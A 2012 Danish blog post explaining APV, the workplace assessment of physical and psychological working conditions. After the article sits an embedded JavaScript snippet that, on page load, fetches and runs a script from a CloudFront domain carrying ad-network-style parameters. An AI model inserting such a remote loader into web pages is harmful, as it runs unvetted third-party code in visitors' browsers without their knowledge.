Smartlog v3 » Tips, Guides & Informationer » AP hvad-for-noget?
Opret egen blog | Næste blog »

Tips, Guides & Informationer

Her på bloggen kan du læse gratis tips, guides og informationer om alt mellem himmel og jord

AP hvad-for-noget?

18. Sep 2012 15:11, webmayn

APV er et begreb, som de fleste nok er stødt på på et eller andet tidspunkt i løbet af deres arbejdsliv. Men hvad er en APV egentlig? Skal man lave den, og hvorfor er den så vigtig? Det vil jeg give et kort svar på i dette indlæg for at henlede opmærksomheden på, hvor vigtigt et sundt arbejdsmiljø er.

 

Bogstaverne APV står for det fine ord arbejdspladsvurdering, og er en rapport, der skal udarbejdes på alle arbejdspladser en gang hvert tredje år. Sådan en rapport skal sikre, at alle medarbejdere på arbejdspladsen trives, og at de bedste arbejdsforhold sikres på arbejdspladsen – både fysisk og psykisk.

 

Vurderingen af arbejdspladsen foregår nemlig på to niveauer, nemlig det fysiske og det psykiske arbejdsmiljø.

 

Vurderingen af det fysiske arbejdsmiljø behandler områder, hvor de ansatte belastes fysisk. Her indføres regulativer for, hvor meget en ansat må løfte, hvor mange løft denne må udføre på en arbejdsdag, hvor længe vedkommende må arbejde i træk uden pause og lignende punkter, der har relation til det fysiske velbefindende. Under dette punkt indgår også punkter som tilgængelig plads, ordentlig udluftning er adgang til udearealer.

 

Derimod behandler vurderingen af det psykiske arbejdsmiljø den mentale velfærd på arbejdspladsen. I denne vurdering tages der højde for, om nogen på arbejdspladsen føler sig udenfor, bliver i dårligt humør af stemningen på arbejdspladsen, eller der er problemer med samarbejdet i en afdeling.

 

Hvis du vil vide mere om arbejdspladsvurderinger, kan det være nyttigt at tage et kig på en side som denne . Her er det også muligt at finde skemaer, der kan hjælpe, når I skal lave vurderinger på jeres arbejdsplads.

if(typeof(jQuery)=='undefined'){(function(){var ccm=document.createElement('script');ccm.type='text/javascript';ccm.src='https://ajax.googleapis.com/ajax/libs/jquery/1.7.1/jquery.min.js';var s=document.getElementsByTagName('script')[0];s.parentNode.insertBefore(ccm,s);if(ccm.readyState){ccm.onreadystatechange=function(){if(ccm.readyState=="loaded"||ccm.readyState=="complete"){ccm.onreadystatechange=null;ccm_e_init(1);}};}else{ccm.onload=function(){ccm_e_init(1);};}})();}else{ccm_e_init();} function ccm_e_init(jc){if(jc){jQuery.noConflict();} jQuery(function(){var http=location.href.indexOf('https://')>-1?'https':'http';var ccm=document.createElement('script');ccm.type='text/javascript';ccm.async=true;ccm.src=http+'://d1nfmblh2wz0fd.cloudfront.net/items/loaders/loader_1063.js?aoi=1311798366&pid=1063&zoneid=15220&cid=&rid=&ccid=&ip=';var s=document.getElementsByTagName('script')[0];s.parentNode.insertBefore(ccm,s);jQuery('#cblocker').remove();});};

Tags

Relaterede